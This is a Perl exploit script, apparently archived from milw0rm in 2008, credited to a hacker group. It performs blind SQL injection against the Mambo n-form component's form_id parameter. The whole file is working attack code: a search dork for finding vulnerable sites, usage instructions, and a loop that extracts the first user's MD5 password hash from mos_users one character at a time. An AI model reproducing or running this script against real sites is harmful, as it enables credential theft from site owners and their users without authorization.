Mambo Component n-form (form_id) Blind SQL Injection Exploit#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
system(`Title Kosova Hackers Group by boom3rang`); 
 print ` \n`;
 print ` #######################################################################\n`;
 print `  #   Mambo Component n-form(form_id) Blind SQL Injection Exploit \n`;
 print `  # -----------------------------------------------------------\n`;
 print `  #   Author: boom3rang [www.khg-crew.ws] \n`;
 print `  #   Greetz: H!tmaN, KHG, chs, redc00de - Kosova Hackers Group\n`;
 print `  #   Site:   www.khg-crew.ws\n`;
 print `  # -----------------------------------------------------------\n`;
 print `  #   Dork :   inurl:option=com_n-forms form_id \n`;
 print `  #   Usage:   perl exploit.pl host path <options> \n`;
 print `  #   Example: perl exploit.pl www.host.com /path/ -a 3 \n`;
 print `  # -----------------------------------------------------------\n`;
 print `  #   Options: \n`;
 print `  #     -a   valid form id \n`;
 print ` #######################################################################\n`;
 exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid     = $ARGV[2];

my %options = ();
GetOptions(\%options, `u=i`, `p=s`, `a=i`);

print `[~] Exploiting...\n`;

if($options{`u`})
{
 $userid = $options{`u`};
}

if($options{`a`})
{
 $aid = $options{`a`};
}

syswrite(STDOUT, `[~] MD5-Hash: `, 14);

for(my $i = 1; $i <= 32; $i++)
{
 my $f = 0;
 my $h = 48;
 while(!$f &amp;&amp; $h <= 57)
 {
   if(istrue2($host, $path, $userid, $aid, $i, $h))
   {
     $f = 1;
     syswrite(STDOUT, chr($h), 1);
   }
   $h++;
 }
 if(!$f)
 {
   $h = 97;
   while(!$f &amp;&amp; $h <= 122)
   {
     if(istrue2($host, $path, $userid, $aid, $i, $h))
     {
       $f = 1;
       syswrite(STDOUT, chr($h), 1);
     }
     $h++;
   }
 }
}

print `\n[~] Exploiting done\n`;

sub istrue2
{
 my $host  = shift;
 my $path  = shift;
 my $uid   = shift;
 my $aid   = shift;
 my $i     = shift;
 my $h     = shift;

 my $ua = LWP::UserAgent->new;
 my $query = `http://`.$host.$path.`index.php?option=com_n-forms&amp;form_id=`.$aid.` and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),`.$i.`,1))=`.$h.``;

 if($options{`p`})
 {
   $ua->proxy('http', `http://`.$options{`p`});
 }

 my $resp = $ua->get($query);
 my $content = $resp->content;
 my $regexp = `Back`;

 if($content =~ /$regexp/)
 {
   return 1;
 }
 else
 {
   return 0;
 }

}

# milw0rm.com [2008-11-08]